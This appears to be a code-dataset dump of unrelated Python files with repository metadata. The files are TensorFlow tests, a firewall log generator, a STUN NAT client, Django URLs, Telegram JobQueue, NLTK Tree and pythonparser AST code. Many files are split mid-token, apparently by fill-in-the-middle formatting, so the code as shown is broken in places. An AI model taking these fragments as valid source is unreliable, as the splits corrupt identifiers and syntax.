rt(np.sum(np.square(u_initial), axis=(0, 1, 2))) w_norms = np.sqrt(np.sum(np.square(w_initial), axis=(0, 1, 2))) # We expect that the abcdef weights are normalized in pairs, that # the unpaired weights are normalized on their own, and the # untouched weights are in fact untouched. self.assertAllClose(np.array(u_final * u_norms), u_initial) self.assertAllClose(np.array(v_final * u_norms), v_initial) self.assertAllClose(np.array(w_final * w_norms), w_initial) self.assertAllClose(x_initial, x_final) class AssignmentHelperTest(tf.test.TestCase): def test_basic(self): x = tf.get_variable('x', shape=[2, 3]) y = tf.get_variable('y', shape=[4]) tf.get_variable('z', shape=[5, 6]) helper = experiment_utils.AssignmentHelper([x, y]) with self.test_session() as sess: helper.assign(np.arange(10.0), sess) self.assertAllClose(sess.run(x), [[0.0, 1.0, 2.0], [3.0, 4.0, 5.0]]) self.assertAllClose(sess.run(y), [6.0, 7.0, 8.0, 9.0]) self.assertAllClose( helper.retrieve(sess), [0.0, 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0]) if __name__ == '__main__': tf.test.main()
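The behavior pinned down by FilterNormalizationTest can be sketched in plain NumPy (the TensorFlow graph version lives in experiment_utils, which is not shown here). Shapes and the weight/bias pairing follow the test; the data is made up.

import numpy as np

rng = np.random.default_rng(0)
weights = rng.normal(size=(7, 5, 3, 2))  # spatial x spatial x in x out
biases = rng.normal(size=(2,))

# One norm per output filter, reduced over the spatial and input axes.
norms = np.sqrt(np.sum(np.square(weights), axis=(0, 1, 2)))
weights_normed = weights / norms
biases_normed = biases / norms  # paired biases share their filter's norm

# These are exactly the relations the test asserts after normalization.
assert np.allclose(weights_normed * norms, weights)
assert np.allclose(biases_normed * norms, biases)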
jpacerqueira/jpac-flume-logs
generator/gen_events.py
Python
apache-2.0
1,662
0.015042
#!/usr/bin/python ''' This script is used to generate a set of random-ish events to simulate log data from a Juniper Netscreen FW. It was built around using netcat to feed data into Flume for ingestion into a Hadoop cluster. Once you have Flume configured you would use the following command to populate data: ./gen_events.py 2>&1 | nc 127.0.0.1 9999 ''' import random from netaddr import * from time impo
rt sleep protocols = ['6', '17'] common_ports = ['20','21','22','23','25','80','109','110','119','143','156','161','389','443
'] action_list = ['Deny', 'Accept', 'Drop', 'Reject']; src_network = IPNetwork('192.168.1.0/24') dest_network = IPNetwork('172.35.0.0/16') fo = open("replay_log.txt", "w") while (1 == 1): proto_index = random.randint(0,1) protocol = protocols[proto_index] src_port_index = random.randint(0,13) dest_port_index = random.randint(0,13) src_port = common_ports[src_port_index] dest_port = common_ports[dest_port_index] action_index = random.randint(0,3) action = action_list[action_index] src_ip_index = random.randint(1,254) src_ip = src_network[src_ip_index] dest_ip_index = random.randint(1,65535) dest_ip = dest_network[dest_ip_index] event = "192.168.1.3 Netscreen-FW1: NetScreen device_id=Netscreen-FW1 [Root]system-notification-00257(traffic): start_time=\"YYYY-MM-DD HH:MM:SS\" duration=0 policy_id=125 service=syslog proto=%s src zone=Untrust dst zone=Trust action=%s sent=0 rcvd=0 src=%s dst=%s src_port=%s dst_port=%s session_id=0" % (protocol, action, src_ip, dest_ip, src_port, dest_port) fo.write(event + "\n") print event sleep(0.3) fo.close()
nthiep/global-ssh
gosh/stun.py
Python
agpl-3.0
4,914
0.037241
import struct, socket, time, logging from gosh.config import STUN_SERVER, STUN_PORT, logger from gosh import JsonSocket #============================================================================= # STUN Client # ============================================================================ class StunClient(object): ## defined protocol TCP='TCP' UDP='UDP' def __init__(self, pro): self.tcp=False if pro == 'TCP': self.tcp = True self.port = None else: self.sock = None def NAT_Behavior_Discovery(self): mapping = self.mapping_behavior() if self.tcp: self.port = None elif self.sock: self.sock.close() self.sock = None if self.tcp: filtering = 0 else: filtering = self.filtering_behavior() if self.sock: self.sock.close() self.sock = None return mapping, filtering def CreateMessage(self, changeip=False, changeport=False): """ create message binding request""" data = {} data["STUN-TYPE"] = 'BIN
DING_REQUEST' data["CHANGE-REQUEST"] = 'CHANGE-REQUEST' data["CHANGE-IP"] = changeip d
ata["CHANGE-PORT"] = changeport return data def binding_request(self, server, port, request, mapping=False): """ check nat type """ udpconnect = False if self.tcp: self.sock = JsonSocket(JsonSocket.TCP) self.sock.set_reuseaddr() if self.port: self.sock.bind(self.port) logger.debug("binding_request: Bind on port %d" %self.port) else: self.port = self.sock.bind(0) else: if not self.sock: self.sock = JsonSocket(JsonSocket.UDP) if mapping: udpconnect = True self.sock.set_timeout(3) if self.sock.connect(server, port, udpconnect): self.sock.send_obj(request) try: data = self.sock.read_obj() except Exception, e: logger.debug("binding_request: %s" %e) return False self.local_addr = self.sock.getsockname() logger.debug("binding_request: Local address %s:%d" %self.local_addr) if self.tcp: self.sock.close() else: self.sock.set_timeout(None) if 'BINDING-RESPONSE' in data: return False return data return False def mapping_behavior(self): """ mapping behavior testing nat """ message = self.CreateMessage() data = self.binding_request(STUN_SERVER, STUN_PORT, message, True) if not data: return False #============================================= # TEST I # ============================================ logger.debug("mapping_behavior: TEST_I") LOCAL_ADDR = "%s:%d" % self.local_addr TEST_I = data['XOR-MAPPED-ADDRESS'] logger.debug("mapping_behavior: Public IP %s"%TEST_I) OTHER_SERVER, OTHER_PORT = data['OTHER-ADDRESS'].split(":") if LOCAL_ADDR == TEST_I: return 10 else: #============================================= # TEST II # ============================================ logger.debug("mapping_behavior: TEST_II") message = self.CreateMessage() data = self.binding_request(OTHER_SERVER, STUN_PORT, message, True) if not data: return False TEST_II = data['XOR-MAPPED-ADDRESS'] logger.debug("mapping_behavior: Public IP %s"%TEST_II) if TEST_I == TEST_II: return 1 else: #============================================= # TEST III # ============================================ logger.debug("mapping_behavior: TEST_III") message = self.CreateMessage() data = self.binding_request(OTHER_SERVER, int(OTHER_PORT), message, True) if not data: return False TEST_III = data['XOR-MAPPED-ADDRESS'] logger.debug("mapping_behavior: Public IP %s"%TEST_III) if TEST_II == TEST_III: return 2 else: if self.tcp: port1 = int(TEST_I.split(":")[1]) port2 = int(TEST_II.split(":")[1]) port3 = int(TEST_III.split(":")[1]) if abs(port2-port1) < 5 and abs(port3-port1) <5: if port1 < port2 < port3: return 4 elif port1 > port2 > port3: return 5 return 3 def filtering_behavior(self): """ filtering behavior testing nat """ #============================================= # TEST I # ============================================ logger.debug("filtering_behavior: TEST_I") message = self.CreateMessage() data = self.binding_request(STUN_SERVER, STUN_PORT, message) if not data: return False #============================================= # TEST II # ============================================ logger.debug("filtering_behavior: TEST_II") message = self.CreateMessage(changeip=True, changeport=True) data = self.binding_request(STUN_SERVER, STUN_PORT, message) if data: return 1 else: logger.debug("filtering_behavior: TEST_III") #============================================= # TEST III # ============================================ message = self.CreateMessage(changeip=False, changeport=True) data = self.binding_request(STUN_SERVER, STUN_PORT, message) if data: return 2 else: return 3
underbluewaters/marinemap
lingcod/news/urls.py
Python
bsd-3-clause
788
0.006345
from dja
ngo.conf.urls.defaults import * from models import Entry, Tag from django.views.generic.dates import ArchiveIndexView, DateDetailView from django.views.generic import TemplateView urlpatterns = patterns('', url(r'^/?$', ArchiveIndexView.as_view(model=Entry, date_field="published_on"), name="news-main"), # url(r'^(?P<year>\d{4})/(?P<month>\d{1,2})/(?P<day>\d{1,2})/(?P<slug>[0-9A-Za-z-]+)/$', 'date_based.object_detail', dict(entry_dict, slug_field='slug', month_format='%m'),name="new
s-detail"), url(r'^(?P<year>\d+)/(?P<month>[-\w]+)/(?P<day>\d+)/(?P<pk>\d+)/$', DateDetailView.as_view(model=Entry, date_field="published_on"), name="news_detail"), url(r'^about/$', TemplateView.as_view(template_name='news/about.html'), name='news-about'), )
alexander-matsievsky/HackerRank
All_Domains/Python/Collections/word-order.py
Python
mit
269
0
from collecti
ons import OrderedDict n = int(input()) occurrences = OrderedDict() for _ in range(0, n): word = input().strip() occ
urrences[word] = occurrences.get(word, 0) + 1 print(len(occurrences)) print(sep=' ', *[count for _, count in occurrences.items()])
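On CPython 3.7+ plain dicts and collections.Counter preserve insertion order, so the same counting can be written more compactly. An alternative sketch with made-up sample input; not part of the original submission.

from collections import Counter

words = ["bcdef", "abcdefg", "bcde", "bcdef"]  # assumed sample input
counts = Counter(words)                        # first-seen order is kept
print(len(counts))                             # 3
print(*counts.values())                        # 2 1 1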
tarmstrong/nbdiff
tests/test_git_adapter.py
Python
mit
3,720
0
from nbdiff.adapter import git_adapter as g from pretend import stub def test_get_modified_notebooks_empty(): g.subprocess = stub(check_output=lambda cmd: 'true\n' if '--is-inside-work-tree' in cmd else '') adapter = g.GitAdapter() result = adapter.get_modified_notebooks() assert result == [] def test_get_modified_notebooks_deleted(): adapter = g.GitAdapter() def check_output_stub(cmd): if '--modified' in cmd: output = '''foo.ipynb bar.ipynb foo.txt baz.ipynb ''' return output elif '--unmerged' in cmd: return ''.join([ '100755\thash\t{i}\tfoo.ipynb\n' for i in [1, 2, 3] ]) elif '--is-inside-work-tree' in cmd: return 'true\n' elif '--show-toplevel' in cmd: return '/home/user/Documents' def popen(*args, **kwargs): return stub(stdout=stub(read=lambda: "")) g.open = lambda fname: stub(read=lambda: "") g.subprocess = stub( check_output=check_output_stub, PIPE='foo', Popen=popen, ) g.os.path.exists = lambda path: 'bar.ipynb' in path result = adapter.get_modified_notebooks() assert result[0][2] == 'bar.ipynb'
assert len(result) == 1 def test_get_modified_notebooks(): adapter = g.GitA
dapter() def check_output_stub(cmd): if '--modified' in cmd: output = '''foo.ipynb bar.ipynb foo.txt baz.ipynb ''' return output elif '--unmerged' in cmd: return ''.join([ '100755\thash\t{i}\tfoo.ipynb\n' for i in [1, 2, 3] ]) elif '--is-inside-work-tree' in cmd: return 'true\n' elif '--show-toplevel' in cmd: return '/home/user/Documents' def popen(*args, **kwargs): return stub(stdout=stub(read=lambda: "")) g.open = lambda fname: stub(read=lambda: "") g.subprocess = stub( check_output=check_output_stub, PIPE='foo', Popen=popen, ) g.os.path.exists = lambda path: True result = adapter.get_modified_notebooks() assert result[0][2] == 'bar.ipynb' assert result[1][2] == 'baz.ipynb' assert len(result) == 2 def test_get_unmerged_notebooks_empty(): g.subprocess = stub(check_output=lambda cmd: 'true\n' if '--is-inside-work-tree' in cmd else '') adapter = g.GitAdapter() result = adapter.get_unmerged_notebooks() assert result == [] def test_get_unmerged_notebooks(): adapter = g.GitAdapter() def check_output_stub(cmd): if '--unmerged' in cmd: f1 = ''.join([ '100755\thash\t{i}\tfoo.ipynb\n' for i in [1, 2, 3] ]) f2 = ''.join([ '100755\thash\t{i}\tbar.ipynb\n' for i in [1, 2, 3] ]) f3 = ''.join([ '100755\thash\t{i}\tfoo.py\n' for i in [1, 2, 3] ]) return f1 + f2 + f3 elif '--is-inside-work-tree' in cmd: return 'true\n' elif '--show-toplevel' in cmd: return '/home/user/Documents' def popen(*args, **kwargs): return stub(stdout=stub(read=lambda: "")) g.open = lambda fname: stub(read=lambda: "") g.subprocess = stub( check_output=check_output_stub, PIPE='foo', Popen=popen, ) result = adapter.get_unmerged_notebooks() assert len(result) == 2 assert result[0][3] == '/home/user/Documents/foo.ipynb' assert result[1][3] == '/home/user/Documents/bar.ipynb'
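All of these tests lean on one pattern: a pretend.stub object stands in for the subprocess module, so no git process ever runs. The pattern in isolation, with a hypothetical function under test and a fake return value:

from pretend import stub

def git_toplevel(subprocess_mod):
    # Function under test: asks git for the repository root.
    return subprocess_mod.check_output(
        ['git', 'rev-parse', '--show-toplevel']).strip()

fake_subprocess = stub(
    check_output=lambda cmd: ('/home/user/Documents\n'
                              if '--show-toplevel' in cmd else ''))
assert git_toplevel(fake_subprocess) == '/home/user/Documents'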
rogerscristo/BotFWD
env/lib/python3.6/site-packages/telegram/ext/jobqueue.py
Python
mit
20,684
0.004448
#!/usr/bin/env python # flake8: noqa E501 # # A library that provides a Python interface to the Telegram Bot API # Copyright (C) 2015-2017 # Leandro Toledo de Souza <devs@python-telegram-bot.org> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Lesser Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Lesser Public License for more details. # # You should have received a copy of the GNU Lesser Public License # along with this program. If not, see [http://www.gnu.org/licenses/]. """This module contains the classes JobQueue and Job.""" import logging import time import warnings import datetime import weakref from numbers import Number from threading import Thread, Lock, Event from queue import PriorityQueue, Empty class Days(object): MON, TUE, WED, THU, FRI, SAT, SUN = range(7) EVERY_DAY = tuple(range(7)) class JobQueue(object): """This class allows you to periodically perform tasks with the bot. Attributes: queue (:obj:`PriorityQueue`): The queue that holds the Jobs. bot (:class:`telegram.Bot`): Bot that's send to the handlers. Args: bot (:class:`telegram.Bot`): The bot instance that should be passed to the jobs. Deprecated: prevent_autostart (:obj:`bool`, optional): Thread does not start during initialisation. Use `start` method instead. """ def __init__(self, bot, prevent_autostart=None): if prevent_autostart is not None: warnings.warn("prevent_autostart is being deprecated, use `start` method instead.") self.queue = PriorityQueue() self.bot =
bot self.logger = logging.getLogger(self.__class__.__name__) self.__start_lock = Lock() self.__next_peek_lock = Lock() # to protect self._next_peek & self.__tick self.__tick = Event() self.__thread = None self._next_peek = None self._running = False def put(self, job, next_t=None): """Queue a new job. Note
: This method is deprecated. Please use: :attr:`run_once`, :attr:`run_daily` or :attr:`run_repeating` instead. Args: job (:class:`telegram.ext.Job`): The ``Job`` instance representing the new job. next_t (:obj:`int` | :obj:`float` | :obj:`datetime.timedelta` | :obj:`datetime.datetime` | :obj:`datetime.time`, optional): Time in or at which the job should run for the first time. This parameter will be interpreted depending on its type. * :obj:`int` or :obj:`float` will be interpreted as "seconds from now" in which the job should run. * :obj:`datetime.timedelta` will be interpreted as "time from now" in which the job should run. * :obj:`datetime.datetime` will be interpreted as a specific date and time at which the job should run. * :obj:`datetime.time` will be interpreted as a specific time at which the job should run. This could be either today or, if the time has already passed, tomorrow. """ warnings.warn("'JobQueue.put' is being deprecated, use 'JobQueue.run_once', " "'JobQueue.run_daily' or 'JobQueue.run_repeating' instead") if job.job_queue is None: job.job_queue = self self._put(job, next_t=next_t) def _put(self, job, next_t=None, last_t=None): if next_t is None: next_t = job.interval if next_t is None: raise ValueError('next_t is None') if isinstance(next_t, datetime.datetime): next_t = (next_t - datetime.datetime.now()).total_seconds() elif isinstance(next_t, datetime.time): next_datetime = datetime.datetime.combine(datetime.date.today(), next_t) if datetime.datetime.now().time() > next_t: next_datetime += datetime.timedelta(days=1) next_t = (next_datetime - datetime.datetime.now()).total_seconds() elif isinstance(next_t, datetime.timedelta): next_t = next_t.total_seconds() next_t += last_t or time.time() self.logger.debug('Putting job %s with t=%f', job.name, next_t) self.queue.put((next_t, job)) # Wake up the loop if this job should be executed next self._set_next_peek(next_t) def run_once(self, callback, when, context=None, name=None): """Creates a new ``Job`` that runs once and adds it to the queue. Args: callback (:obj:`callable`): The callback function that should be executed by the new job. It should take ``bot, job`` as parameters, where ``job`` is the :class:`telegram.ext.Job` instance. It can be used to access it's ``job.context`` or change it to a repeating job. when (:obj:`int` | :obj:`float` | :obj:`datetime.timedelta` | :obj:`datetime.datetime` | :obj:`datetime.time`): Time in or at which the job should run. This parameter will be interpreted depending on its type. * :obj:`int` or :obj:`float` will be interpreted as "seconds from now" in which the job should run. * :obj:`datetime.timedelta` will be interpreted as "time from now" in which the job should run. * :obj:`datetime.datetime` will be interpreted as a specific date and time at which the job should run. * :obj:`datetime.time` will be interpreted as a specific time of day at which the job should run. This could be either today or, if the time has already passed, tomorrow. context (:obj:`object`, optional): Additional data needed for the callback function. Can be accessed through ``job.context`` in the callback. Defaults to ``None``. name (:obj:`str`, optional): The name of the new job. Defaults to ``callback.__name__``. Returns: :class:`telegram.ext.Job`: The new ``Job`` instance that has been added to the job queue. 
""" job = Job(callback, repeat=False, context=context, name=name, job_queue=self) self._put(job, next_t=when) return job def run_repeating(self, callback, interval, first=None, context=None, name=None): """Creates a new ``Job`` that runs once and adds it to the queue. Args: callback (:obj:`callable`): The callback function that should be executed by the new job. It should take ``bot, job`` as parameters, where ``job`` is the :class:`telegram.ext.Job` instance. It can be used to access it's ``Job.context`` or change it to a repeating job. interval (:obj:`int` | :obj:`float` | :obj:`datetime.timedelta`): The interval in which the job will run. If it is an :obj:`int` or a :obj:`float`, it will be interpreted as seconds. first (:obj:`int` | :obj:`float` | :obj:`datetime.timedelta` | :obj:`datetime.datetime` | :obj:`datetime.time`, optional): Time in or at which the job should run. This parameter will be interpreted depending on its type. * :obj:`int` or :obj:`float` will be interpreted as "seconds from now" in which the job should run. * :obj:`datetime.timedelta` will be interpreted as "time from now" in which the job should run. * :obj:`
nelango/ViralityAnalysis
model/lib/nltk/tree.py
Python
mit
64,375
0.003216
# -*- coding: utf-8 -*- # Na
tural Language Toolkit: Text Trees # # Copyright (C) 2001-2015 NLTK Project # Author: Edward Loper <edloper@gmail.com> # Steven Bird <stevenbird1@gmail.com> # Peter Ljunglöf <peter.ljunglof@gu.se> # Nathan Bodenstab <bodenstab@cslu.ogi.edu> (tree
transforms) # URL: <http://nltk.org/> # For license information, see LICENSE.TXT """ Class for representing hierarchical language structures, such as syntax trees and morphological trees. """ from __future__ import print_function, unicode_literals # TODO: add LabelledTree (can be used for dependency trees) import re from nltk.grammar import Production, Nonterminal from nltk.probability import ProbabilisticMixIn from nltk.util import slice_bounds from nltk.compat import string_types, python_2_unicode_compatible, unicode_repr from nltk.internals import raise_unorderable_types ###################################################################### ## Trees ###################################################################### @python_2_unicode_compatible class Tree(list): """ A Tree represents a hierarchical grouping of leaves and subtrees. For example, each constituent in a syntax tree is represented by a single Tree. A tree's children are encoded as a list of leaves and subtrees, where a leaf is a basic (non-tree) value; and a subtree is a nested Tree. >>> from nltk.tree import Tree >>> print(Tree(1, [2, Tree(3, [4]), 5])) (1 2 (3 4) 5) >>> vp = Tree('VP', [Tree('V', ['saw']), ... Tree('NP', ['him'])]) >>> s = Tree('S', [Tree('NP', ['I']), vp]) >>> print(s) (S (NP I) (VP (V saw) (NP him))) >>> print(s[1]) (VP (V saw) (NP him)) >>> print(s[1,1]) (NP him) >>> t = Tree.fromstring("(S (NP I) (VP (V saw) (NP him)))") >>> s == t True >>> t[1][1].set_label('X') >>> t[1][1].label() 'X' >>> print(t) (S (NP I) (VP (V saw) (X him))) >>> t[0], t[1,1] = t[1,1], t[0] >>> print(t) (S (X him) (VP (V saw) (NP I))) The length of a tree is the number of children it has. >>> len(t) 2 The set_label() and label() methods allow individual constituents to be labeled. For example, syntax trees use this label to specify phrase tags, such as "NP" and "VP". Several Tree methods use "tree positions" to specify children or descendants of a tree. Tree positions are defined as follows: - The tree position *i* specifies a Tree's *i*\ th child. - The tree position ``()`` specifies the Tree itself. - If *p* is the tree position of descendant *d*, then *p+i* specifies the *i*\ th child of *d*. I.e., every tree position is either a single index *i*, specifying ``tree[i]``; or a sequence *i1, i2, ..., iN*, specifying ``tree[i1][i2]...[iN]``. Construct a new tree. This constructor can be called in one of two ways: - ``Tree(label, children)`` constructs a new tree with the specified label and list of children. - ``Tree.fromstring(s)`` constructs a new tree by parsing the string ``s``. 
""" def __init__(self, node, children=None): if children is None: raise TypeError("%s: Expected a node value and child list " % type(self).__name__) elif isinstance(children, string_types): raise TypeError("%s() argument 2 should be a list, not a " "string" % type(self).__name__) else: list.__init__(self, children) self._label = node #//////////////////////////////////////////////////////////// # Comparison operators #//////////////////////////////////////////////////////////// def __eq__(self, other): return (self.__class__ is other.__class__ and (self._label, list(self)) == (other._label, list(other))) def __lt__(self, other): if not isinstance(other, Tree): # raise_unorderable_types("<", self, other) # Sometimes children can be pure strings, # so we need to be able to compare with non-trees: return self.__class__.__name__ < other.__class__.__name__ elif self.__class__ is other.__class__: return (self._label, list(self)) < (other._label, list(other)) else: return self.__class__.__name__ < other.__class__.__name__ # @total_ordering doesn't work here, since the class inherits from a builtin class __ne__ = lambda self, other: not self == other __gt__ = lambda self, other: not (self < other or self == other) __le__ = lambda self, other: self < other or self == other __ge__ = lambda self, other: not self < other #//////////////////////////////////////////////////////////// # Disabled list operations #//////////////////////////////////////////////////////////// def __mul__(self, v): raise TypeError('Tree does not support multiplication') def __rmul__(self, v): raise TypeError('Tree does not support multiplication') def __add__(self, v): raise TypeError('Tree does not support addition') def __radd__(self, v): raise TypeError('Tree does not support addition') #//////////////////////////////////////////////////////////// # Indexing (with support for tree positions) #//////////////////////////////////////////////////////////// def __getitem__(self, index): if isinstance(index, (int, slice)): return list.__getitem__(self, index) elif isinstance(index, (list, tuple)): if len(index) == 0: return self elif len(index) == 1: return self[index[0]] else: return self[index[0]][index[1:]] else: raise TypeError("%s indices must be integers, not %s" % (type(self).__name__, type(index).__name__)) def __setitem__(self, index, value): if isinstance(index, (int, slice)): return list.__setitem__(self, index, value) elif isinstance(index, (list, tuple)): if len(index) == 0: raise IndexError('The tree position () may not be ' 'assigned to.') elif len(index) == 1: self[index[0]] = value else: self[index[0]][index[1:]] = value else: raise TypeError("%s indices must be integers, not %s" % (type(self).__name__, type(index).__name__)) def __delitem__(self, index): if isinstance(index, (int, slice)): return list.__delitem__(self, index) elif isinstance(index, (list, tuple)): if len(index) == 0: raise IndexError('The tree position () may not be deleted.') elif len(index) == 1: del self[index[0]] else: del self[index[0]][index[1:]] else: raise TypeError("%s indices must be integers, not %s" % (type(self).__name__, type(index).__name__)) #//////////////////////////////////////////////////////////// # Basic tree operations #//////////////////////////////////////////////////////////// def _get_node(self): """Outdated method to access the node value; use the label() method instead.""" raise NotImplementedError("Use label() to access a node label.") def _set_node(self, value): """Outdated method to set the node value; use the 
set_label() method instead.""" raise NotImplementedError("Use set_label() method to set a node label.") node = property(_get_node, _set_node) def label(self): """ Return the node label of the tree. >>> t = Tree.fromstring('(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))') >>> t.label() 'S' :return: the node label (typically a string)
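A quick demonstration of the tree positions the docstring describes, reusing the doctest's sentence (assumes nltk is importable):

from nltk.tree import Tree

t = Tree.fromstring("(S (NP I) (VP (V saw) (NP him)))")
# A tree position is an index path: () is the tree itself, (1,) its
# second child, (1, 1) that child's second child, and so on.
assert t[()] is t
print(t[1])        # (VP (V saw) (NP him))
print(t[1, 1])     # (NP him)
print(t[1, 1, 0])  # him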
learningequality/video-vectorization
video_processing/pipelines/simple_encode_decode.py
Python
mit
902
0.003326
# Copyright 2019 Google LLC. """Pipeline to decode and reencode a video using OpenCV.""" from absl import app from absl import flags from video_processing import processor_runner from video_processing.processors import opencv_video_decoder from video_processing.processors import opencv_video_encoder flags.DEFINE_string('input_video_file', '', 'Input file.') flags.DEFINE_string('output_video_file', '', 'Output file.') FLAGS = flags.FLAGS def pipeline(input_video_file, output_video_file): return [ opencv_video_decoder.OpenCVVideoD
ecoderProcessor( {'input_video_file': input_video_file}), opencv_video_encoder.OpenCVVi
deoEncoderProcessor( {'output_video_file': output_video_file}) ] def main(unused_argv): processor_runner.run_processor_chain( pipeline(FLAGS.input_video_file, FLAGS.output_video_file)) if __name__ == '__main__': app.run(main)
andresriancho/moto
tests/test_ec2/test_placement_groups.py
Python
apache-2.0
109
0
import boto
import sure # noqa from moto import mock_ec2 @mock_ec2 def test_placement_groups
(): pass
google/grumpy
third_party/pythonparser/ast.py
Python
apache-2.0
26,727
0.005131
# encoding: utf-8 """ The :mod:`ast` module contains the classes comprising the Python abstract syntax tree. All attributes ending with ``loc`` contain instances of :class:`.source.Range` or None. All attributes ending with ``_locs`` contain lists of instances of :class:`.source.Range` or []. The attribute ``loc``, present in every class except those inheriting :class:`boolop`, has a special meaning: it encompasses the entire AST node, so that it is possible to cut the range contained inside ``loc`` of a parsetree fragment and paste it somewhere else without altering said parsetree fragment that. The AST format for all supported versions is generally normalized to be a superset of the native :mod:`..ast` module of the latest supported Python version. In particular this affects: * :class:`With`: on 2.6-2.7 it uses the 3.0 format. * :class:`TryExcept` and :class:`TryFinally`: on 2.6-2.7 they're replaced with :class:`Try` from 3.0. * :class:`arguments`: on 2.6-3.1 it uses the 3.2 format, with dedicated :class:`arg` in ``vararg`` and ``kwarg`` slots. """ from __future__ import absolute_import, division, print_function, unicode_literals # Location mixins class commonloc(object): """ A mixin common for all nodes. :cvar _locs: (tuple of strings) names of all attributes with location values :ivar loc: range encompassing all locations defined for this node or its children """ _locs = ("loc",) def _reprfields(self): return self._fields + self._locs def __repr__(self): def value(name): try: loc = self.__dict__[name] if isinstance(loc, list): return "[%s]" % (", ".join(map(repr, loc))) else: return repr(loc) except: return "(!!!MISSING!!!)" fields = ", ".join(map(lambda name: "%s=%s" % (name, value(name)), self._reprfields())) return "%s(%s)" % (self.__class__.__name__, fields) @property def lineno(self): return self.loc.line() class keywordloc(commonloc): """ A mixin common for all keyword statements, e.g. ``pass`` and ``yield expr``. :ivar keyword_loc: location of the keyword, e.g. ``yield``. """ _locs = commonloc._locs + ("keyword_loc",) class beginendloc(commonloc): """ A mixin common for nodes with a opening and closing delimiters, e.g. tuples and lists. :ivar begin_loc: location of the opening delimiter, e.g. ``(``. :ivar end_loc: location of the closing delimiter, e.g. ``)``. """ _locs = commonloc._locs + ("begin_loc", "end_loc") # AST nodes class AST(object): """ An ancestor of all nodes. :cvar _fields: (tuple of strings) names of all attributes with semantic values """ _fields = () def __init__(self, **fields): for field in fields: setattr(self, field, fields[field]) class alias(AST, commonloc): """ An import alias, e.g. ``x as y``. :ivar name: (string) value to import :ivar asname: (string) name to add to the environment :ivar name_loc: location of name :ivar as_loc: location of ``as`` :ivar asname_loc: location of asname """ _fields = ("name", "asname") _locs = commonloc._locs + ("name_loc", "as_loc", "asname_loc") class arg(AST, commonloc): """ A formal argument, e.g. in ``def f(x)`` or ``def f(x: T)``. :ivar arg: (string) argument name :ivar annotation: (:class:`AST`) type annotation, if any; **emitted since 3.0** :ivar arg_loc: location of argument name :ivar colon_loc: location of ``:``, if any; **emitted since 3.0** """ _fields = ("arg", "annotation") _locs = commonloc._locs + ("arg_loc", "colon_loc") class arguments(AST, beginendloc): """ Function definition arguments, e.g. in ``def f(x, y=1, *z, **t)``. 
:ivar args: (list of :class:`arg`) regular formal arguments :ivar defaults: (list of :class:`AST`) values of default arguments :ivar vararg: (:class:`arg`) splat formal argument (if any), e.g. in ``*x`` :ivar kwonlyargs: (list of :class:`arg`) keyword-only (post-\*) formal arguments; **emitted since 3.0** :ivar kw_defaults: (list of :class:`AST`) values of default keyword-only arguments; **emitted since 3.0** :ivar kwarg: (:class:`arg`) keyword splat formal argument (if any), e.g. in ``**x`` :ivar star_loc: location of ``*``, if any :ivar dstar_loc: location of ``**``, if any :ivar equals_locs: locations of ``=`` :ivar kw_equals_locs: locations of ``=`` of default keyword-only arguments; **emitted since 3.0** """ _fields = ("args", "vararg", "kwonlyargs", "kwarg", "defaults", "kw_defaults") _locs = beginendloc._locs + ("star_loc", "dstar_loc", "equals_locs", "kw_equals_locs") class boolop(AST, commonloc): """ Base class for binary boolean operators. This class is unlike others in that it does not have the ``loc`` field. It serves only as an indicator of operation and corresponds to no source itself; locations are recorded in :class:`BoolOp`. """ _locs = () class And(boolop): """The ``and`` operator.""" class Or(boolop): """The ``or`` operator.""" class cmpop(AST, commonloc): """Base class for comparison operators.""" class Eq(cmpop): """The ``==`` operator.""" class Gt(cmpop): """The ``>`` operator.""" class GtE(cmpop): """The ``>=`` operator.""" class In(cmpop): """The ``in`` operator.""" class Is(cmpop): """The ``is``
operator.""" class IsNot(cmpop): """The ``is not`` operator.""" class Lt(cmpop): """The ``<`` operator.""" class LtE(cmpop): """The ``<=`` operator.""" class NotEq(cmpop): """The ``!=`` (or deprecated ``<>``) operator.""" class NotIn(cmpop): """The ``not in`` operator.""" class comprehension(AST, commonloc): """ A
single ``for`` list comprehension clause. :ivar target: (assignable :class:`AST`) the variable(s) bound in comprehension body :ivar iter: (:class:`AST`) the expression being iterated :ivar ifs: (list of :class:`AST`) the ``if`` clauses :ivar for_loc: location of the ``for`` keyword :ivar in_loc: location of the ``in`` keyword :ivar if_locs: locations of ``if`` keywords """ _fields = ("target", "iter", "ifs") _locs = commonloc._locs + ("for_loc", "in_loc", "if_locs") class excepthandler(AST, commonloc): """Base class for the exception handler.""" class ExceptHandler(excepthandler): """ An exception handler, e.g. ``except x as y:· z``. :ivar type: (:class:`AST`) type of handled exception, if any :ivar name: (assignable :class:`AST` **until 3.0**, string **since 3.0**) variable bound to exception, if any :ivar body: (list of :class:`AST`) code to execute when exception is caught :ivar except_loc: location of ``except`` :ivar as_loc: location of ``as``, if any :ivar name_loc: location of variable name :ivar colon_loc: location of ``:`` """ _fields = ("type", "name", "body") _locs = excepthandler._locs + ("except_loc", "as_loc", "name_loc", "colon_loc") class expr(AST, commonloc): """Base class for expression nodes.""" class Attribute(expr): """ An attribute access, e.g. ``x.y``. :ivar value: (:class:`AST`) left-hand side :ivar attr: (string) attribute name """ _fields = ("value", "attr", "ctx") _locs = expr._locs + ("dot_loc", "attr_loc") class BinOp(expr): """ A binary operation, e.g. ``x + y``. :ivar left: (:class:`AST`) left-hand side :ivar op: (:class:`operator`) operator :ivar right: (:class:`AST`) right-hand side """ _fields = ("left", "op", "right") class BoolOp(expr): """ A boolean operation, e.g. ``x and y``. :ivar op: (:class:`boolop`) operator :ivar values: (list of :class:`AST`) operands :ivar op_locs: locations of operators """ _fields = ("op", "values") _locs = expr._locs + ("op_locs",) class Call(expr, beginendloc): """ A function call, e.g. ``f
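Nodes are plain attribute bags: AST.__init__ stores whatever keyword fields it is given, and commonloc.__repr__ walks _fields + _locs, printing (!!!MISSING!!!) for anything never set. A small sketch, assuming the module is importable as pythonparser.ast:

from pythonparser import ast

node = ast.alias(name="json", asname="j",
                 loc=None, name_loc=None, as_loc=None, asname_loc=None)
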